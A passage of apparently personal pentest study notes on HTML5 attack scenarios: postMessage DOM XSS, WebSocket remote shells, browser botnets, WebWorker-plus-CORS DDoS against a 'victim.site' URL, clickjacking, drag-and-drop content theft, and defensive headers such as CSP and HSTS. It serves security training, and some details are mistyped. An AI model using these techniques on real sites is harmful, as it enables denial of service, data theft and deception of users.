  <li>This is typical For various social networks like facebook, or universities.</li>
</ul>

<p>Example:</p>

<ul>
  <li>If a XSS flaw is found in the university path uni.edu/~professorX, its possible to read all stored data in all the directories available in the university domain uni.edu.</li>
</ul>

<h3 id="using-tracking-and-confidential-data-disclosure">Using Tracking and Confidential Data Disclosure</h3>
<p>Its possible to perform User Traking if websites use Web Storage objects to store information about users behaviors rather than HTTP Cookies.</p>

<h3 id="indexeddb">IndexedDB</h3>
<p>When working with structured data, it does not provide an efficient mechanism to search over values.</p>

<p>To address these limitations, two options that HTML5 introduced:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="nx">IndexedDB</span> <span class="o">-</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/IndexedDB/</span>
<span class="o">-</span> <span class="nx">Web</span> <span class="nx">SQL</span> <span class="nx">Databse</span> <span class="o">-</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/webdatabase/</span>
<span class="c1">// the second was deprectated in 2010</span>
</code></pre></div></div>

<ul>
  <li>webSQL database is a relational database access system, whereas IndexedDB is an indexed table system.</li>
  <li>Indexed Database API is an HTML5 API introduced For high performance searches on client-side storage. The idea is that this storage would hold significantamounts of structured, indexed data, thereby giving developers an efficient client-side querying mechanism.</li>
  <li>
    <p>Its a transactional technology, however, not relational. The database system saves key-value pairs in object stores and allows searching data by using indexes also known as keys.</p>
  </li>
  <li>The primary risks are related to <strong>information leakage</strong> and <strong>information spoofing</strong></li>
  <li>IndexedDB follows the Same-Origin Policy but limits the use to HTTP and HTTPS in all browser except Internet Explorer.</li>
</ul>

<p>This also allows <strong>ms-wwa</strong> and <strong>ms-wwa-web</strong> protocols For their apps in the new Windows UI format.</p>

<h2 id="web-messaging-attack-scenarios">Web Messaging Attack Scenarios</h2>
<p>→ http://www.w3.org/TR/webmessaging/</p>

<p>This is also referred as Cross Document Messaging or postMessage (API name)</p>

<p>Communications between the embedded <strong>iframes</strong> and the hosting website are now possible.</p>

<h3 id="dom-xss">DOM XSS</h3>
<p>This occurs if the postMessage data received is used without validation. Such as <strong>innerHTML, write, etc</strong>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="c1">// Say Hello</span>
<span class="kd">var</span> <span class="nx">hello</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">hellobox</span><span class="dl">"</span><span class="p">);</span>
<span class="nx">hello</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Hello </span><span class="dl">"</span><span class="o">+</span><span class="nx">e</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span>
<span class="c1">// HTMLElement Sink           User controlled values</span>
</code></pre></div></div>

<h3 id="origin-issue">Origin Issue</h3>
<p>The Web Messaging Protocl allows the presence of the Origin header field</p>

<p>The Origin header is not mandatory, but it can help reduce the attack surface by both limiting the interaction with trusted origins and reducing the likelihood of a <strong>Client-side DoS</strong>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if </span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">origin</span> <span class="o">!=</span> <span class="dl">'</span><span class="s1">http://trusted.site</span><span class="dl">'</span><span class="p">){</span>
<span class="c1">// Origin not allowed</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>As we have seen with CORS, even if it cannot be done via browser, the origin header can be spoofed by creating requests outside the browser.</p>

<h2 id="web-sockets-attack-scenarios">Web Sockets Attack Scenarios</h2>
<p>→ http://tools.ietf.org/html/rfc6455</p>

<p>→ http://www.w3.org/TR/websockets/</p>

<p>HTML5 Web Sockets can provide a 500:1 or –depending on the size of the HTTP headers - even a 1000:1 reduction in unnecessary HTTP header traffic and 3:1 reduction in latency.</p>

<p>That is not just an incremental improvement; that is a revolutionary jump.</p>

<blockquote>
  <p>If we are able to execute JavaScript code inside the victim browser, its possible to establish a Web Socket connection and perform our malicious operations.</p>
</blockquote>

<h3 id="data-validation">Data validation</h3>
<p>One of the simplest data validation issues to find may be XSS and while looking For it, we might also find other types of Injections concerning both client-side and server-side.</p>

<h3 id="mitm">MiTM</h3>
<p>WebSocket Protocol standard defines two schemes For web socket connections:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">xs</span>  <span class="o">=</span> <span class="nx">unencrypted</span>
<span class="nx">xss</span> <span class="o">=</span> <span class="nx">encrypted</span>
</code></pre></div></div>

<p>If the implementation uses the unencrypted channel, we have a MiTM issue whereby, anybody on the network can see and manipulate the traffic.</p>

<h3 id="remote-shell">Remote Shell</h3>
<p>If we are able to execute JavaScript code on the victim browser, by either exploiting an XSS flaw or tricking the victim into visiting a malicious website, we could conveniently establish a full Web Socket connection and, as a result, have a Remote Shell active until the window/tab is closed.</p>

<h3 id="network-reconnaissance">Network Reconnaissance</h3>
<p>Nice tools to test both scenarios JS-Recon</p>

<p>→ https://web.archive.org/web/20120313125925/http:/www.andlabs.org/tools/jsrecon/jsrecon.html</p>

<h2 id="web-workers-attack-scenarios">Web Workers Attack Scenarios</h2>
<p>→ http://www.w3.org/TR/workers/</p>

<p>Web workers is the solution, introduced by HTML5, to allow thread-like operations within web browsers. it allows most modern browser to run Javascript in the background.</p>

<p>Methods like <strong>setTimeout, setInterval or even XMLHttpRequest</strong>, provided a valid solution to achieving parallelism by using thread-like messaging.</p>

<p>Two types:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Dedicated</span> <span class="nx">Web</span> <span class="nx">Workers</span><span class="p">:</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/workers/#dedicated-workers-and-the-worker-interface</span>
<span class="nx">Shared</span> <span class="nx">Web</span> <span class="nx">Workers</span><span class="p">:</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//www.w3.org/TR/workers/#shared-workers-and-the-sharedworker-interface</span>
</code></pre></div></div>

<ul>
  <li>A dedicated workers can only be accessed through the script that created it, while the shared one can be accessed by any script from the same domain.</li>
  <li>It did not introduce new threats, but increased the performance and feasibility of the attack.</li>
</ul>

<h3 id="browser-based-botnet">Browser-Based Botnet</h3>
<p>We can run the Javascript code on all the browsers that support the features the bot uses. This also includes any OS that can run a browser, even on televisions, gaming console, etc.</p>

<p>Two stages:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="mi">1</span><span class="p">.</span> <span class="nx">Infect</span> <span class="nx">the</span> <span class="nx">victims</span><span class="p">:</span> <span class="nx">XSS</span><span class="p">,</span> <span class="nx">email</span> <span class="nx">spam</span><span class="p">,</span> <span class="nx">social</span> <span class="nx">engineering</span><span class="p">...</span>
<span class="o">-</span> <span class="mi">2</span><span class="p">.</span> <span class="nx">Manage</span> <span class="nx">Persistence</span><span class="p">:</span> <span class="nx">the</span> <span class="nx">malicious</span> <span class="nx">code</span> <span class="nx">will</span> <span class="nx">work</span> <span class="nx">until</span> <span class="nx">the</span> <span class="nx">victim</span> <span class="nx">browser</span> <span class="nx">is</span> <span class="nx">closed</span><span class="p">.</span>
</code></pre></div></div>

<p>Sometimes, implementing a game can help u keep the victim on the malicious page. If the game is both interactive and especially addictive, the user may remain online the entire day.</p>

<p>With an HTML5 Botnet, some of the possibel attacks that can be performed are:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Email</span> <span class="nx">Spam</span>
<span class="nx">Distributed</span> <span class="nx">Password</span> <span class="nx">Cracking</span>
<span class="nx">DDoS</span> <span class="nx">Attacks</span>
<span class="nx">Phishing</span>
<span class="nx">Data</span> <span class="nx">Mining</span>
<span class="nx">Intranet</span> <span class="nx">Reconnaissance</span>
</code></pre></div></div>

<h3 id="distributed-password-cracking">Distributed Password Cracking</h3>
<ul>
  <li>Ravan</li>
</ul>

<p>→ http://web.archive.org/web/20160315031218/http:/www.andlabs.org/tools/ravan.html</p>

<blockquote>
  <p>A system based on WebWorkers to perform password cracking of <em>MD5</em>, <em>SHA1</em>, <em>SHA256</em>, <em>SHA512</em> hashes.</p>
</blockquote>

<h3 id="webworkers--cors---ddos-attacks">WebWorkers + CORS - DDoS Attacks</h3>
<p>Adding CORS we could generate a large number of GET/POST requests to a remote website. We would be using COR requests to perform a DDoS attack.</p>

<ul>
  <li>We dont care if the response is blocked or wrong, we care about sending as many requests as possible.</li>
</ul>

<p>To bypass the CORS limitation, add facke parameters in the query-string. It will force the browser to transform each request, therefore identifying it as unique:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">http</span><span class="p">:</span><span class="c1">//victim.site/dossable.php?search=X</span>
<span class="nx">x</span> <span class="o">=</span> <span class="nx">use</span> <span class="nx">random</span> <span class="nx">values</span> <span class="nx">here</span>
</code></pre></div></div>

<h2 id="security-measures">Security Measures</h2>

<h3 id="security-headers-x-xss-protection">Security Headers: X-XSS-Protection</h3>
<p>To protect against Reflected XSS attacks</p>

<h3 id="security-headers-x-frame-options">Security Headers: X-Frame-Options</h3>
<p>Prevent Clickjacking</p>

<ul>
  <li>This header introduced a way For the server to instruct the browser on wheter to display the transmitted content in frame of other web pages.</li>
</ul>

<p>Syntax:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">X</span><span class="o">-</span><span class="nx">Frame</span><span class="o">-</span><span class="nx">Options</span><span class="p">:</span> <span class="nx">value</span>

<span class="err">#</span> <span class="nx">DENY</span> <span class="o">=</span> <span class="nx">the</span> <span class="nx">page</span> <span class="nx">cannot</span> <span class="nx">be</span> <span class="nx">displayed</span> <span class="k">in</span> <span class="nx">a</span> <span class="nx">frame</span><span class="p">,</span> <span class="nx">regardless</span> <span class="k">of</span> <span class="nx">the</span> <span class="nx">site</span> <span class="nx">attempting</span> <span class="nx">to</span> <span class="k">do</span> <span class="nx">so</span><span class="p">.</span>
<span class="err">#</span> <span class="nx">SAMEORIGIN</span> <span class="o">=</span> <span class="nx">The</span> <span class="nx">page</span> <span class="nx">can</span> <span class="nx">only</span> <span class="nx">be</span> <span class="nx">displayed</span> <span class="k">in</span> <span class="nx">a</span> <span class="nx">frame</span> <span class="nx">on</span> <span class="nx">the</span> <span class="nx">same</span> <span class="nx">origin</span> <span class="k">as</span> <span class="nx">the</span> <span class="nx">page</span> <span class="nx">itself</span><span class="p">.</span>
<span class="err">#</span> <span class="nx">ALLOW</span><span class="o">-</span><span class="nx">FROM</span> <span class="nx">URI</span> <span class="o">=</span> <span class="nx">The</span> <span class="nx">page</span> <span class="nx">can</span> <span class="nx">only</span> <span class="nx">be</span> <span class="nx">displayed</span> <span class="k">in</span> <span class="nx">a</span> <span class="nx">frame</span> <span class="nx">on</span> <span class="nx">the</span> <span class="nx">specific</span> <span class="nx">origin</span><span class="p">.</span>
</code></pre></div></div>

<h3 id="security-headers-strict-transport-security-hsts">Security Headers: Strict-Transport-Security (HSTS)</h3>
<p>→ http://tools.ietf.org/html/rfc6797</p>

<p>It allows a server to declare itself accessible only via secure connections. It also allows For users to be able to direct their user agents to interact with given sites over secure connections only.</p>

<p>To enable this mechanism, the response header <strong>Strict-Transport-Security</strong> is required. (its not supported by all vendors.</p>

<p>→ http://caniuse.com/#feat=stricttransportsecurity</p>

<p>Syntax:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Strict</span><span class="o">-</span><span class="nx">Transport</span><span class="o">-</span><span class="nx">Security</span><span class="p">:</span> <span class="nx">max</span><span class="o">-</span><span class="nx">age</span><span class="o">=&lt;</span><span class="nx">delta</span><span class="o">-</span><span class="nx">seconds</span><span class="o">&gt;</span><span class="p">;</span> <span class="nx">includeSubDomains</span>

<span class="err">#</span> <span class="nx">One</span> <span class="nx">year</span> <span class="k">in</span> <span class="nx">cache</span> <span class="nx">is</span> <span class="dl">'</span><span class="s1">max-age=31536000</span><span class="dl">'</span> <span class="p">(</span><span class="nx">Optional</span><span class="p">)</span>
<span class="err">#</span> <span class="nx">While</span> <span class="nx">to</span> <span class="nx">remove</span> <span class="nx">or</span> <span class="dl">'</span><span class="s1">not cache</span><span class="dl">'</span> <span class="nx">is</span> <span class="nx">max</span><span class="o">-</span><span class="nx">age</span><span class="o">=</span><span class="mi">0</span>
</code></pre></div></div>

<h3 id="security-headers-x-content-type-options">Security Headers: X-Content-Type-Options</h3>
<p>To indicate a specific resource, web server use the response header Content-Type which contains a standard MIME type( text/html, image/png, etc) with some optional parameters (character set)</p>

<p>→  attack scenarios - http://blog.fox-it.com/2012/05/08/mime-sniffing-feature-or-vulnerability/</p>

<p>The most common is <strong>Content Sniffing XSS</strong></p>

<p>→ http://www.adambarth.com/papers/2009/barth-caballero-song.pdf</p>

<ul>
  <li>This header instructs the browser to <strong>not guess</strong> the content type of the resource and trust of the Content-Type header.</li>
</ul>

<p>Syntax:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">X</span><span class="o">-</span><span class="nx">Content</span><span class="o">-</span><span class="nx">Type</span><span class="o">-</span><span class="nx">Options</span><span class="p">:</span> <span class="nx">nosniff</span>
<span class="c1">// only works on IE and Chrome</span>
</code></pre></div></div>

<h3 id="security-headers-content-security-policy-csp">Security Headers: Content Security Policy (CSP)</h3>
<p>Its a defende mechanism that can significantly reduce the risk impact of a broad class of content injection vulnerabilities. These include <strong>XSS</strong> and <strong>UI Redressing</strong> in modern browsers.</p>

<p>Headers adopted:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">X</span><span class="o">-</span><span class="nx">Content</span><span class="o">-</span><span class="nx">Security</span><span class="o">-</span><span class="nx">Policy</span> <span class="nx">and</span> <span class="nx">X</span><span class="o">-</span><span class="nx">WebKit</span><span class="o">-</span><span class="nx">CSP</span>
</code></pre></div></div>

<p>CSP uses a collection of directives in order to define a specific set of whitelisted sources of trusted content</p>

<p>→ http://www.w3.org/TR/CSP/#directives</p>

<p>The most common is script-src = http://www.w3.org/TR/CSP/#script-src:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Content-Security-Policy: script-src 'self' https://other.web.site

//                   Directive Name      Values
// 1 Defines which scripts the protected resource can execute
// 2 the allowed sources of scripts
</code></pre></div></div>

<p>Directives work in default-allow mode. This simply means that if a specific directive does not have a policy defined, then its equal to ‘*’; thus, every source is a valid source.</p>

<p>The <strong>default-src</strong> directive will be applied to all the unspecified directives:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Content</span><span class="o">-</span><span class="nx">Security</span><span class="o">-</span><span class="nx">Policy</span><span class="p">:</span> <span class="k">default</span><span class="o">-</span><span class="nx">src</span> <span class="dl">'</span><span class="s1">self</span><span class="dl">'</span>
</code></pre></div></div>

<p>With CSP, its also possible to deny resources. For example, if the web app does not need plugins or to be framed, then the policy can be enriched as follow:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Content</span><span class="o">-</span><span class="nx">Security</span><span class="o">-</span><span class="nx">Policy</span><span class="p">:</span> <span class="k">default</span><span class="o">-</span><span class="nx">src</span> <span class="nx">https</span><span class="p">:</span><span class="c1">//my.web.site;</span>
<span class="nx">object</span><span class="o">-</span><span class="nx">src</span> <span class="dl">'</span><span class="s1">none</span><span class="dl">'</span><span class="p">;</span> <span class="nx">frame</span><span class="o">-</span><span class="nx">src</span> <span class="dl">'</span><span class="s1">none</span><span class="dl">'</span>
<span class="c1">// 'none' returns an empty set For the allowed sources</span>
</code></pre></div></div>

<p>CSP specification: http://www.w3.org/TR/CSP/</p>

<p>Defines the following list directives:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">default</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">script</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">object</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">style</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">img</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">media</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">frame</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">font</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">connect</span><span class="o">-</span><span class="nx">src</span>
<span class="nx">report</span><span class="o">-</span><span class="nx">uri</span> <span class="c1">// reporting feature</span>
<span class="nx">sandbox</span>    <span class="c1">// optional</span>
</code></pre></div></div>

<p>There are four keywords that are also allowed:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">none</span> <span class="o">-</span> <span class="nx">no</span> <span class="nx">sources</span>
<span class="nb">self</span> <span class="o">-</span> <span class="nx">current</span> <span class="nx">origin</span><span class="p">,</span> <span class="nx">but</span> <span class="nx">not</span> <span class="nx">its</span> <span class="nx">subdomains</span>
<span class="nx">unsafe</span><span class="o">-</span><span class="nx">inline</span> <span class="o">-</span> <span class="nx">allows</span> <span class="nx">inline</span> <span class="nx">JavaScript</span> <span class="nx">and</span> <span class="nx">CSS</span>
<span class="nx">unsafe</span><span class="o">-</span><span class="nb">eval</span> <span class="o">-</span> <span class="nx">allows</span> <span class="nx">text</span><span class="o">-</span><span class="nx">to</span><span class="o">-</span><span class="nx">JavaScript</span> <span class="nx">sinks</span> <span class="nx">like</span> <span class="dl">'</span><span class="s1">eval, alert, setTimeout...</span><span class="dl">'</span>

<span class="c1">// These keywords must be used with single-quotes, otherwise they refer to server named none, self, etc</span>
</code></pre></div></div>

<p>Report violations mechanism:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Content</span><span class="o">-</span><span class="nx">Security</span><span class="o">-</span><span class="nx">Policy</span><span class="p">:</span> <span class="k">default</span><span class="o">-</span><span class="nx">src</span> <span class="dl">'</span><span class="s1">self</span><span class="dl">'</span><span class="p">;</span> <span class="nx">report</span><span class="o">-</span><span class="nx">uri</span> <span class="o">/</span><span class="nx">csp_report</span><span class="p">;</span>
<span class="c1">// once a violation is detected, the browser will perform a POST request to the path specified, sending a JSON object, similar to the one on the next slide.</span>
</code></pre></div></div>

<p>Example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
  "csp-report": {
    "document-uri":"http://my.web.site/page.html",
    "referrer":"http://hacker.site/",
    "blocked-uri":"https://hacker.site/xss_test.js",
    "violated-directive":"script-src 'self'",
    "original-policy":"script-src 'self'; report-uri http://my.web.site/csp_report"
  }
}
</code></pre></div></div>

<h4 id="csp-playground">CSP Playground</h4>
<p>To test CSP options</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.cspplayground.com/
</code></pre></div></div>

<h2 id="ui-redressing---the-x-jacking-art">UI Redressing - The x-Jacking Art</h2>
<p>A category of attacks that aim to change visual elements in a user interface in order to conceal malicious activities.</p>

<p>Example such as:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span> <span class="nx">Overlaying</span> <span class="nx">a</span> <span class="nx">visible</span> <span class="nx">button</span> <span class="kd">with</span> <span class="nx">an</span> <span class="nx">invisible</span> <span class="nx">one</span>
<span class="o">-</span> <span class="nx">Changing</span> <span class="nx">the</span> <span class="nx">cursos</span> <span class="nx">position</span> 
<span class="o">-</span> <span class="nx">Manipulating</span> <span class="nx">other</span> <span class="nx">elements</span> <span class="k">in</span> <span class="nx">the</span> <span class="nx">user</span> <span class="kr">interface</span>
<span class="o">-</span> <span class="nx">Also</span> <span class="nx">known</span> <span class="k">as</span> <span class="nx">ClickJacking</span><span class="p">,</span> <span class="nx">LikeJacking</span><span class="p">,</span> <span class="nx">StrokeJacking</span><span class="p">,</span> <span class="nx">FileJacking</span> <span class="nx">and</span> <span class="nx">others</span>
</code></pre></div></div>

<h3 id="clickjacking">ClickJacking</h3>
<p>This attack uses a nested iframe from a target website and a little bit of CSS magic.</p>

<p>A submission button or whatever the attack chooses to trigger an action:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">For</span> <span class="nx">example</span><span class="p">:</span> <span class="o">**</span><span class="nx">find</span> <span class="nx">willie</span><span class="o">**</span><span class="p">,</span> <span class="nx">when</span> <span class="nx">clicked</span> <span class="nx">it</span> <span class="nx">triggers</span> <span class="nx">the</span> <span class="nx">attack</span>
</code></pre></div></div>

<h3 id="likejacking">LikeJacking</h3>
<p>→ http://nakedsecurity.sophos.com/2010/05/31/facebook-likejacking-worm/</p>

<ul>
  <li>The target are social networks and their features.</li>
  <li>THe likes are perceived as popularity and quality nowadays, so there is ways to buy likes to give the public this wrong perception</li>
</ul>

<h3 id="strokejacking">StrokeJacking</h3>
<p>→ http://seclists.org/fulldisclosure/2010/Mar/232</p>

<p>A technique to hijack keystrokes, is proof that UI Redressing is not only all about hijacking clicks.</p>

<p>Example:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">http</span><span class="p">:</span><span class="c1">//blog.andlabs.org/2010/04/stroke-triggered-xss-and-strokejacking_06.html</span>
</code></pre></div></div>

<h2 id="new-attack-vectors-in-html5">New Attack Vectors in HTML5</h2>

<p>Drag-and-Drop:</p>

<ul>
  <li>With html5 this drag-and-drop mechanims has been transformed into something natively supported by all desktop-based browsers.</li>
</ul>

<h3 id="text-field-injection">Text Field Injection</h3>
<p>The first technique allows the attacker-controller to drag data into hidden text fields/forms on different origins.</p>

<p>→ http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html</p>

<h3 id="content-extraction">Content Extraction</h3>
<p>Allow us to extract content from areas we cannot access. (restricted areas). In this scenario, we must trick the victim into dragging their private data into areas under our control.</p>

<ul>
  <li>In order to trick the victim so we can extract content from the targeted web page, we must know what to extract and where it is located.</li>
</ul>

<p>If the secret is part of a URL, is an HTML anchor element or an image, dragging is easy. Cause the elements will be converted into a serialized URL.</p>

<ul>
  <li>Its difficult when the content is not draggable like textual content. So we need to trick the victim to select first before dragging.</li>
</ul>

<p>We could use the view-source: to load the HTML source code into an iframe.</p>

<p>Example:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">iframe</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">view-source:http://victim.site/secretInfo/</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/iframe</span><span class="err">&gt;
</span></code></pre></div></div>

<blockquote>
  <p>however, this technique only works on Firefox, without the NoScript add-on.</p>
</blockquote>


        
      </section>

      <footer class="page__meta">
        
        
  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/tags/#advanced" class="page__taxonomy-item" rel="tag">advanced</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#pentest" class="page__taxonomy-item" rel="tag">pentest</a><span class="sep">, </span>
    
      
      
      <a href="/tags/#web" class="page__taxonomy-item" rel="tag">web</a>
    
    </span>
  </p>




  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/categories/#ewptx" class="page__taxonomy-item" rel="tag">ewptx</a><span class="sep">, </span>
    
      
      
      <a href="/categories/#notes" class="page__taxonomy-item" rel="tag">notes</a>
    
    </span>
  </p>


        
          <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2023-11-30T00:00:00+06:00">November 30, 2023</time></p>
        
      </footer>

      <section class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?text=6+-+HTML5%20http%3A%2F%2Flocalhost%3A4000%2Fnotes%2Fewptx%2Fhtml5%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2Fnotes%2Fewptx%2Fhtml5%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Flocalhost%3A4000%2Fnotes%2Fewptx%2Fhtml5%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/notes/ewptx/csrf/" class="pagination--pager" title="5 - Cross-site request forgery (CSRF)
">Previous</a>
    
    
      <a href="/notes/ewptx/sqli/" class="pagination--pager" title="7 - SQL Injection
">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">

    </div>

    
  <script src="/assets/js/main.min.js"></script>
  <script src="https://kit.fontawesome.com/4eee35f757.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>





  
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
  
    <script src="/assets/js/clipboard.js"></script>
  



  </body>
</html>
